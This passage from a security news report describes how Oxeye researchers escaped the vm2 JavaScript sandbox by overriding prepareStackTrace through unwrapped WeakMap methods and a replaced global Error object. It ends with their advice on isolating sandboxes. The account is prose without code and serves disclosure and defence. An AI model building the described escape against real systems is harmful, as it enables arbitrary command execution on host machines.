This behavior can lead to sandbox escapes because some of the "CallSite" objects "may return objects created outside the sandbox when invoking the 'getThis' method," they wrote. If an attackers could gain hold of a "CallSite" object created outside of the sandbox, they could access Node's global objects and execute arbitrary system commands from there.

**Bypassing the Mitigation**

The maintainers of vm2 were aware that overriding "prepareStackTrace" could indeed lead to a sandbox escape. They tried to mitigate the escape path by wrapping the Error object and the "prepareStackTrace" method with their own implementation, which succeeded in preventing anyone from overriding the method and performing the escape, they said.

However, Oxeye researchers found they could bypass this, because vm2 missed wrapping specific methods related to the "WeakMap" JavaScript built-in type, they said. "This allowed the attacker to provide their own implementation of 'prepareStackTrace,' then trigger an error, and escape the sandbox," the researchers wrote.

Knowing that the prepareStackTrace function of the Error object is the function they needed to override to escape the sandbox, Oxeye researchers went even further and decided to try to override the global Error object with their own object.

Doing this implemented the prepareStackTrace function, which allowed them to escape the sandbox. A few simple steps later and they had access to the currently executing process and could execute commands on the system running the sandbox, they said.

**Using Sandboxes Safely**

Although sandboxes by their very nature are meant to safely run untrusted code within an app or system, enterprises shouldn't automatically assume they are without risk, the researchers warned.

However, if using a sandbox in an environment is unavoidable, Oxeye recommends reducing risk by separating the logical, sensitive part of an application from the microservice that runs the sandbox code.

This will ensure that "if a threat actor successfully breaks out from the sandbox, the attack surface is limited to the isolated microservice," the researchers wrote.

Enterprises also should avoid using a sandbox that relies on a dynamic programming language such as JavaScript when possible, they said.

"The dynamic nature of the language widens the attack surface for a potential attacker, making defending against such attacks much harder," researchers observed in their post.

Tag

#js